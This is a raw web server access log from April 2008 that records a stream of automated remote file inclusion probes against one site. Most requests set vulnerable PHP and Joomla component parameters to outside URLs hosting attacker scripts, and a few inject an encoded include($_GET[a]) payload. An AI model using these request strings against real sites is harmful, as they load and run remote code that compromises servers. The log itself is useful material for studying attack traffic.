81.169.130.142 - - [30/Apr/2008:09:42:10 -0700] "GET /logs/view.inc.php?phpAds_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:42:16 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:42:16 -0700] "GET //config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:42:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:42:26 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:42:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:42:27 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:42:53 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:42:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:42:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:43:00 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:43:01 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.246.36.8 - - [30/Apr/2008:09:43:04 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.36.8 - - [30/Apr/2008:09:43:04 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:09:43:25 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:09:43:26 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.113.203.55 - - [30/Apr/2008:09:43:33 -0700] "GET /logs/access_080227.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:43:38 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.165.133 - - [30/Apr/2008:09:43:39 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:43:47 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.106 - - [30/Apr/2008:09:43:47 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:09:43:52 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:09:43:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:09:43:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:09:43:54 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:09:44:05 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:09:44:09 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:09:44:10 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:09:44:12 -0700] "GET /logs//errors.php?error=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/idp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:09:44:13 -0700] "GET //errors.php?error=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/idp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:09:44:20 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:44:24 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:44:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:44:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:09:45:14 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:09:45:16 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.137.18 - - [30/Apr/2008:09:45:16 -0700] "GET /logs/access_080315.log/templates/mangobery/footer.sample.php?Site_Path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [30/Apr/2008:09:45:16 -0700] "GET /logs/templates/mangobery/footer.sample.php?Site_Path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:09:45:16 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Apr/2008:09:45:39 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Apr/2008:09:45:39 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.137.18 - - [30/Apr/2008:09:45:47 -0700] "GET /logs/access_080108.log/templates/mangobery/footer.sample.php?Site_Path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:09:45:51 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:09:45:52 -0700] "GET //config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:09:45:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.138.183 - - [30/Apr/2008:09:46:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pcpaclass16.com/user/spread.txt??? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:46:34 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.138.183 - - [30/Apr/2008:09:46:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pcpaclass16.com/user/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.15.138.183 - - [30/Apr/2008:09:46:36 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/install/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.15.138.183 - - [30/Apr/2008:09:46:38 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/install/test.txt???? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.145.232.237 - - [30/Apr/2008:09:47:00 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.6.22.175 - - [30/Apr/2008:09:47:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.90 - - [30/Apr/2008:09:47:04 -0700] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.90 - - [30/Apr/2008:09:47:05 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:09:47:08 -0700] "GET /logs/access_071224.log/index2.php?content=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.145.232.237 - - [30/Apr/2008:09:47:09 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:09:47:11 -0700] "GET /index2.php?content=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:09:47:14 -0700] "GET /logs/index2.php?content=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.13.98.174 - - [30/Apr/2008:09:47:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hulhanet.com.br/adilamar/entrevistas/data/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
204.13.98.174 - - [30/Apr/2008:09:47:20 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hulhanet.com.br/adilamar/entrevistas/data/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:09:47:21 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:47:33 -0700] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/confirm.php?spaw_root=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:47:33 -0700] "GET /include/inc_ext/spaw/dialogs/confirm.php?spaw_root=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.127.234 - - [30/Apr/2008:09:47:33 -0700] "GET /logs/include/inc_ext/spaw/dialogs/confirm.php?spaw_root=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.199.201 - - [30/Apr/2008:09:47:36 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.32.199.201 - - [30/Apr/2008:09:47:36 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:47:44 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:47:44 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:47:51 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:47:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:47:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:47:53 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:47:54 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:09:47:59 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:09:47:59 -0700] "GET //config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:09:48:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:48:13 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:48:13 -0700] "GET //Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:48:13 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:09:48:14 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:09:48:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:09:48:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:09:48:26 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:09:48:26 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:09:48:26 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:09:48:29 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:48:33 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:48:33 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:48:34 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:48:35 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:09:48:35 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:09:48:36 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:48:42 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:48:42 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:48:42 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:09:48:43 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:09:48:43 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:48:45 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:48:45 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:48:50 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:48:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:48:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:09:48:51 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:48:52 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [30/Apr/2008:09:48:53 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.8.53 - - [30/Apr/2008:09:48:57 -0700] "GET /logs//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [30/Apr/2008:09:49:02 -0700] "GET //atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.47.165.69 - - [30/Apr/2008:09:49:04 -0700] "GET //components/com_facileforms/index.php?mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.47.165.69 - - [30/Apr/2008:09:49:07 -0700] "GET /logs//components/com_facileforms/index.php?mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
